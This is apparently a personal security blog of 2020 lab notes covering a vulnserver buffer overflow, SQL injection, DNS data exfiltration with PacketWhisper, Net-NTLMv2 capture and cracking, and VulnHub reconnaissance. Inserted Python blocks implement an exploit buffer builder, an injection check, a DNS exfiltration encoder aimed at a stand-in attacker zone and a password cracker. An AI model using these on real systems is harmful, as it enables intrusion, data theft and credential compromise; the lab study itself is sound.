Wednesday, 30 September 2020

bof steps (using tcm guide)

Below are the rough steps taken to perform a buffer overflow using TCM's guide from his Udemy course (although I think he has a guide on YouTube too, not sure if it's the exact same). The idea is to have the key steps noted here for future reference.
  • Run vulnserver and Immunity Debugger as admin, attach to the vulnserver process and un-pause it.
  • On the attacking machine connect to vulnserver, e.g. nc -nv 192.168.1.100 9999, to review the available commands.
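The step that follows fuzzing in the same procedure is working out how far into the buffer EIP gets overwritten. The block below is an added example, not code from TCM's guide or this post: it reproduces what msf-pattern_create / msf-pattern_offset do, so the offset can be found offline from the EIP value Immunity Debugger shows at the crash, and shows the usual buffer layout once the offset and a JMP ESP address are known. The crash value and return address used in the usage line are constructed placeholders, not values from a real run.

```python
# Added example (not from TCM's guide or the original post): EIP-offset step of
# the vulnserver overflow, done offline. Crash/return values below are placeholders.
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern Aa0Aa1Aa2...Aa9Ab0...: every 4-byte window is
    unique within the first 20280 bytes, which is what makes the offset lookup work."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern longer than 20280 bytes would repeat")
    chunks = (u + l + d for u, l, d in product(ascii_uppercase, ascii_lowercase, digits))
    return "".join(chunks).encode()[:length]


def find_offset(pattern: bytes, eip: int) -> int:
    """Offset of the 4 pattern bytes that landed in EIP.

    x86 is little-endian, so a register value of 0x386F4337 corresponds to the
    bytes b'7Co8' in the order they sat in the buffer; search in that order.
    Returns -1 when the value is not in the pattern (EIP not fully overwritten,
    or the crash is not controlled by this buffer).
    """
    return pattern.find(eip.to_bytes(4, "little"))


def exploit_buffer(offset: int, jmp_esp: int, shellcode: bytes, nop_sled: int = 16) -> bytes:
    """Classic layout once the offset is known: padding | JMP ESP address | NOPs | shellcode.
    jmp_esp is whatever address mona/Immunity reports for a JMP ESP in a module
    without protections; the 4 bytes are written little-endian like EIP above."""
    return b"A" * offset + jmp_esp.to_bytes(4, "little") + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    pat = cyclic_pattern(3000)
    crash_eip = int.from_bytes(pat[2003:2007], "little")   # constructed crash value
    print("offset:", find_offset(pat, crash_eip))
    print(len(exploit_buffer(find_offset(pat, crash_eip), 0x11223344, b"\xcc" * 4)), "byte buffer")
```

Send cyclic_pattern(n) in place of the fuzzer's "A"*n, read EIP from the Access Violation in Immunity, and feed it to find_offset; -1 means the register was not overwritten by this buffer and the crash needs another look before moving on to bad characters.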

Wednesday, 16 September 2020

Local File Inclusion to RCE

Below are rough notes on a recent HTB machine where a Local File Inclusion (LFI) led to Remote Code Execution (RCE) and access to the machine.

nmap returned a lot of open ports, and a forced browse with OWASP ZAP turned up multiple web apps. One app kindly included its version number on the page, which made searching for known exploits very easy.

Sunday, 12 July 2020

sql injection using sqlmap

Below are notes on a SQL injection lab. First I identify that the page is susceptible to injection, then run sqlmap to extract the database content.

The lab has a simple news page, with each news item requested through an id=# parameter. First I enter an invalid ID followed by a true OR clause (an id that does not exist, then something like OR 1=1) and the page still returns content:
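The boolean check above (a non-existent id that comes back with content once a true OR clause is appended) is what sqlmap automates. The block below is an added example, not code from the lab or from sqlmap: it runs that check against a constructed in-memory news table, with the vulnerable query next to its parameterised form so the difference in behaviour is visible. Table contents, the 9999 sentinel and the function names are made up for the demo.

```python
# Added example, not from the lab or sqlmap: manual boolean-based SQLi check
# against a constructed sqlite news table; vulnerable handler beside hardened one.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the lab's news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "Site launched"), (2, "Maintenance window"), (3, "New feature")])
    return conn


def vulnerable_lookup(conn, id_param: str) -> list:
    """What a typical news.php?id=... handler gets wrong: the parameter is pasted
    into the SQL text, so '9999 OR 1=1' rewrites the WHERE clause."""
    sql = "SELECT id, title FROM news WHERE id = " + id_param   # deliberately unsafe
    return conn.execute(sql).fetchall()


def safe_lookup(conn, id_param: str) -> list:
    """Hardened form: validate the type, then bind the value, so the database
    engine never parses user input as SQL."""
    try:
        news_id = int(id_param)
    except ValueError:
        return []
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (news_id,)).fetchall()


def looks_injectable(lookup, conn, bogus_id: str = "9999") -> bool:
    """The manual test from the note: a non-existent id should return nothing;
    if a true OR clause brings content back while a false one does not, the
    parameter is being concatenated into the query."""
    baseline = lookup(conn, bogus_id)
    with_true = lookup(conn, bogus_id + " OR 1=1")
    with_false = lookup(conn, bogus_id + " OR 1=2")
    return not baseline and bool(with_true) and not with_false


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", looks_injectable(vulnerable_lookup, db))
    print("parameterised handler injectable:", looks_injectable(safe_lookup, db))
```

Comparing the true and false variants (not just the true one) avoids a false positive from a page that returns default content for any bad id. Against the real lab page the same comparison is what sqlmap's boolean-based technique does before it starts dumping tables.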

Thursday, 2 July 2020

exfiltrate data over dns with packetwhisper

I had a chance to use PacketWhisper in a lab exercise recently and wanted to try it out again in a different environment for my own notes. Below are the rough steps taken to set up and run the test. First I cloned the repo on the target machine:

git clone https://github.com/TryCatchHCF/PacketWhisper.git
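To make clear what PacketWhisper is doing on the wire, here is an added example that is not PacketWhisper's own code: a stripped-down version of the idea, carrying a blob out as DNS queries under a zone the attacker can see queries for. Data is base32 encoded (the only safe label alphabet), cut into labels of at most 63 bytes and names of at most 253 bytes, and each query carries a sequence number so the receiver can reorder and detect gaps. PacketWhisper goes further and disguises the queries as look-alike FQDNs chosen from a cipher set; this block shows only the plain chunking and reassembly. The domain, chunk size and sample payload are assumptions for the demo.

```python
# Added example, not PacketWhisper's code: plain base32 DNS exfil encoder/decoder
# showing the chunking and reassembly PacketWhisper builds on. Domain is made up.
import base64

EXFIL_DOMAIN = "exfil.example.com"      # hypothetical attacker-controlled zone
MAX_LABEL = 63                           # RFC 1035 label limit
MAX_NAME = 253                           # practical full-name limit
CHUNK_BYTES = 100                        # 100 raw bytes -> 160 base32 chars -> 3 labels


def _b32(data: bytes) -> str:
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(data: bytes, domain: str = EXFIL_DOMAIN) -> list:
    """Turn a blob into the list of FQDNs the victim host would resolve."""
    names = []
    for seq, start in enumerate(range(0, len(data), CHUNK_BYTES)):
        text = _b32(data[start:start + CHUNK_BYTES])
        labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
        name = ".".join([f"s{seq}"] + labels + [domain])
        if len(name) > MAX_NAME:          # a resolver would reject it; fail loudly instead
            raise ValueError("name too long; lower CHUNK_BYTES")
        names.append(name)
    names.append(f"end{len(names)}.{domain}")   # trailer: how many chunks to expect
    return names


def decode_queries(names: list, domain: str = EXFIL_DOMAIN) -> bytes:
    """Receiver side, run over the authoritative server's query log or a pcap
    filtered on the zone. Ignores unrelated queries and tolerates out-of-order
    arrival, but refuses to return a partial file."""
    chunks = {}
    expected = None
    for name in names:
        if not name.endswith("." + domain):
            continue
        labels = name[: -len(domain) - 1].split(".")
        if labels[0].startswith("end"):
            expected = int(labels[0][3:])
        elif labels[0].startswith("s"):
            chunks[int(labels[0][1:])] = _unb32("".join(labels[1:]))
    if expected is None or len(chunks) != expected:
        raise ValueError(f"incomplete transfer: {len(chunks)} of {expected} chunks")
    return b"".join(chunks[i] for i in range(expected))


if __name__ == "__main__":
    sample = b"constructed secret file contents\n" * 10
    queries = encode_queries(sample)
    print(len(queries), "queries, first:", queries[0])
    print(decode_queries(queries) == sample)
```

The same chunking is why the technique is easy to spot in DNS logs: many long, high-entropy subdomains under one zone in quick succession. PacketWhisper's cipher FQDNs are its answer to exactly that detection, at the cost of far lower throughput.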

Tuesday, 23 June 2020

responder hash capture hashcat crack

Quick steps below for capturing a Net-NTLMv2 hash and trying to crack it using Responder and Hashcat. What Responder captures is the NTLMv2 challenge-response (it labels it NTLMv2-SSP), not the NT hash itself, so it can be cracked offline or relayed but not used for pass-the-hash. Below I forced a direct connection attempt to the pentest machine to get the hash.
sudo responder -I wlan0 -rdw
Once I try connecting to the pentest machine at \\192.168.50.165, Responder prints the hash, which I save to adminhash.txt.

(screenshot: responder hash capture)
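What hashcat does with that line is recompute the response for each candidate password and compare. The block below is an added example, not code from Responder or hashcat: it implements the NetNTLMv2 computation hashcat's mode 5600 uses, builds a stand-in capture line in Responder's user::domain:challenge:NTProofStr:blob format from a known password (no real hash is on the page), and cracks it with a small wordlist. The user, domain, challenge, blob bytes and wordlist are all constructed for the demo. MD4 is implemented inline with a hashlib fast path, because hashlib only exposes md4 when OpenSSL's legacy provider is loaded.

```python
# Added example, not Responder/hashcat code: NetNTLMv2 recomputation (hashcat -m 5600
# in miniature) against a constructed capture line. All sample values are made up.
import hashlib
import hmac
import struct


def _md4(msg: bytes) -> bytes:
    """RFC 1320 MD4; pure-Python fallback when hashlib lacks md4 (OpenSSL 3 default)."""
    try:
        return hashlib.new("md4", msg).digest()
    except ValueError:
        pass
    mask = 0xFFFFFFFF
    rotl = lambda x, s: ((x << s) | (x >> (32 - s))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    bit_len = len(msg) * 8
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                  # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                  # round 2
            k = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)[i]
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what pass-the-hash needs and
    what the captured line does NOT contain."""
    return _md4(password.encode("utf-16-le"))


def ntlmv2_response(password: str, user: str, domain: str, server_chal: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTLMv2-hash, server_challenge || blob), with
    NTLMv2-hash = HMAC-MD5(NT-hash, UTF-16LE(upper(user) || domain))."""
    ntlmv2_hash = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), "md5").digest()
    return hmac.new(ntlmv2_hash, server_chal + blob, "md5").digest()


def build_demo_capture(password: str, user: str = "admin", domain: str = "WORKGROUP") -> str:
    """Constructed stand-in for a Responder line (format: user::domain:challenge:proof:blob).
    Fixed challenge and blob bytes keep it deterministic; the blob layout only needs
    to be opaque bytes for cracking purposes."""
    server_chal = bytes.fromhex("1122334455667788")
    blob = (b"\x01\x01" + b"\x00" * 6                        # version, reserved
            + bytes.fromhex("00d0a5e2b7a6d601")              # timestamp (constructed)
            + bytes.fromhex("a1b2c3d4e5f60718")              # client nonce (constructed)
            + b"\x00" * 4
            + b"\x02\x00\x12\x00" + domain.encode("utf-16-le")   # one AV pair: NetBIOS domain
            + b"\x00" * 4 + b"\x00" * 4)
    proof = ntlmv2_response(password, user, domain, server_chal, blob)
    return f"{user}::{domain}:{server_chal.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, wordlist):
    """Recompute the proof for each candidate; return the password or None."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_response(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


if __name__ == "__main__":
    captured = build_demo_capture("Winter2020!")
    print(captured)
    print("cracked:", crack(captured, ["letmein", "Password1", "Winter2020!"]))
```

For a real capture the equivalent is hashcat -m 5600 adminhash.txt wordlist.txt. Because the server challenge and client blob differ per authentication, a cracked password is reusable but the captured line itself is not, which is why the alternative to cracking is relaying the live authentication rather than replaying the hash.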

Wednesday, 27 May 2020

root vulnhub sumo

Rough steps to root on VulnHub Sumo

  • A quick nmap scan shows some fairly dated versions:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
|   2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_  256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:17:08:AB (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5